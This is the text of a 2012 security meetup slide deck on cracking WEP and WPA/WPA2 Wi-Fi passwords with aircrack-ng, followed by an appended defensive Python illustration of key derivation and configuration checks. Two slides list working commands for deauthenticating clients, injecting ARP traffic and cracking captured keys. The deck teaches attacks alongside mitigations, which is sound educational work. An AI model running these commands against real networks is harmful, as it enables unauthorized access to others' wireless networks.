Feb-8-2012-Breaking-Wireless-Security


Presentation I gave at DC207's regular meeting hosted at BlueTarp Financial (https://www.bluetarp.com).

The presentation is a quick overview, for a group of industry professionals and university students (many of whom have never done anything like this), of using the aircrack-ng suite of tools to crack WEP and WPA passwords. A sandboxed wireless network was set up and live demonstrations were given.

1 Comment
  • very strong password breaker


  1. Breaking Wireless Security: cracking WEP & WPA, presented by Casey, DC207
  2. what we're covering
     - Using the aircrack-ng suite to
       - capture wireless traffic
       - retrieve WEP password
       - retrieve WPA/WPA2 passwords
  3. what we're not covering
     - cryptographic specifics
     - in-depth packet analysis
     - brute forcing WPS (Wi-Fi Protected Setup)
       - time
  4. t00ls
     - BackTrack Linux
     - Aircrack-ng
     - ALFA Wireless USB Adapter
       - (Model AWUS036H)
  5. Yay! BlueTarp!
  6. WEP
     - Wired Equivalent Privacy (WEP)
     - Sept. 1999 in original 802.11 standard
     - uses an RC4 stream cipher
     - crypto is inherently flawed
     - deprecated in 2004 in favor of WPA2
     - still available on routers today
  7. WEP encryption
     - RC4 cipher uses Key + IV (initialization vector)
     - August 2001: Scott Fluhrer, Itsik Mantin, and Adi Shamir
     - passive attack to recover Key
     - need a busy network or a way to produce enough traffic
     - with enough IVs can calculate the Key
  8. cracking WEP
     - place card in monitor mode
         # airmon-ng start wlan0
     - capture packets to the desired AP
         # airodump-ng mon0 --bssid <bssid> --channel <c> --write crackme
     - wait for an authorized client to connect
       - can also deauthenticate clients
           # aireplay-ng -0 5 -a <bssid> mon0
     - spoof ARP responses to generate more traffic
         # aireplay-ng -3 -b <bssid> -h <client_mac> mon0
     - use aircrack-ng to crack the key
         # aircrack-ng crackme.cap
  9. DEMO
  10. WEP cracking mitigation
     - none.
     - don't use.
     - password complexity DOES NOT MATTER
  11. WPA
     - Wi-Fi Protected Access
     - WPA became available in 1999
     - uses TKIP encryption algorithm
     - intermediate step until WPA2
  12. WPA2
     - WPA2 available in 2004
     - uses CCMP-AES encryption
     - WPA-Personal PSK (Pre-Shared Key)
       - home/small office use
     - WPA-Enterprise
       - requires a RADIUS server for authentication
  13. WPA encryption
     - encryption based on AES
     - no known public exploits that attack the crypto
     - brute force attack
     - uses SSID of network as part of encryption
     - precomputation is much harder
  14. Yay! BlueTarp!
  15. cracking WPA / WPA2
     - place card in monitor mode
         # airmon-ng start wlan0
     - capture packets to the desired AP
         # airodump-ng mon0 --bssid <bssid> --channel <c> --write crackme
     - capture handshake from connecting client
       - can force clients to deauthenticate to capture it
           # aireplay-ng -0 5 -a <bssid> mon0
     - use aircrack-ng to try to brute force the key
       - requires a good wordlist
           # aircrack-ng crackme.cap -w wordlist
  16. DEMO
  17. WPA cracking mitigation
     - use a password >= 15 characters
     - don't use a name in the top 1000 SSID list
     - disable WPS!
  18. WPS
     - Wi-Fi Protected Setup
     - attempt at easy secure access
     - wanted to make it easy to add new devices
     - almost universally enabled on new routers
     - completely fails to a brute force attack
       - revealed in December 2011
       - get the WPS PIN, use it to retrieve the PSK
     - when enabled, renders WPA/WPA2 useless
     - Linksys routers still vulnerable with WPS disabled
  19. Thanks for coming! Thank you Jon and BlueTarp for hosting and food! Questions? Help? [email_address] @CaseyDunham dc207.org @DCG207
  20. resources
     - BackTrack Linux: backtrack-linux.org
     - Aircrack-ng: aircrack-ng.org
     - ALFA Networks: alfa.com.tw
     - DC207: dc207.org
     - BlueTarp: bluetarp.com
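Added here as an illustration, not part of Casey's slides, of two points the deck makes: the WEP slides' claim that enough IVs break RC4 no matter how complex the key is, and the WPA slides' point that the SSID is part of the key derivation, so precomputation is per-network and passphrase length is what matters. The PBKDF2 parameters are the IEEE 802.11i ones; the short SSID list and the audit function are constructed stand-ins for the slide's "top 1000 SSID list" and its three mitigation rules.

```python
import hashlib
import math

# WPA/WPA2-Personal derives its 256-bit PMK from the passphrase with
# PBKDF2-HMAC-SHA1, salted with the SSID and fixed at 4096 iterations
# (IEEE 802.11i). WEP prepends a 24-bit IV to the RC4 key for every frame.
WPA_PBKDF2_ITERATIONS = 4096
WEP_IV_SPACE = 2 ** 24


def wpa_pmk(passphrase: str, ssid: str) -> bytes:
    """Pairwise Master Key exactly as a WPA/WPA2-PSK supplicant and AP compute it."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(),
                               WPA_PBKDF2_ITERATIONS, dklen=32)


def pmk_differs_across_ssids(passphrase: str, ssid_a: str, ssid_b: str) -> bool:
    """True when one passphrase yields different PMKs on two SSIDs: a table
    precomputed for one network's name is useless against another's."""
    return wpa_pmk(passphrase, ssid_a) != wpa_pmk(passphrase, ssid_b)


def wep_iv_repeat_probability(frames: int) -> float:
    """Birthday-bound probability that some 24-bit WEP IV has repeated after
    `frames` frames. A repeated IV means reused RC4 keystream, and the FMS-style
    attacks need only enough of them; the WEP key's complexity is irrelevant."""
    return 1.0 - math.exp(-frames * (frames - 1) / (2.0 * WEP_IV_SPACE))


# Constructed stand-in for the "top 1000 SSID" list; the real list is not on the page.
SAMPLE_TOP_SSIDS = {"linksys", "default", "NETGEAR", "dlink", "Wireless"}


def psk_config_findings(ssid: str, passphrase: str, wps_enabled: bool,
                        top_ssids=SAMPLE_TOP_SSIDS) -> list:
    """Check a WPA/WPA2-Personal setup against the three mitigation slide rules."""
    findings = []
    if len(passphrase) < 15:
        findings.append("passphrase shorter than 15 characters")
    if ssid in top_ssids:
        findings.append("SSID is on the common-SSID list (precomputed tables exist)")
    if wps_enabled:
        findings.append("WPS enabled (PIN brute force bypasses the PSK)")
    return findings


if __name__ == "__main__":
    print(wpa_pmk("password", "IEEE").hex())            # 802.11i Annex H test vector
    print(round(wep_iv_repeat_probability(5000), 2))   # better than even odds by 5000 frames
    print(psk_config_findings("linksys", "password", True))
```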
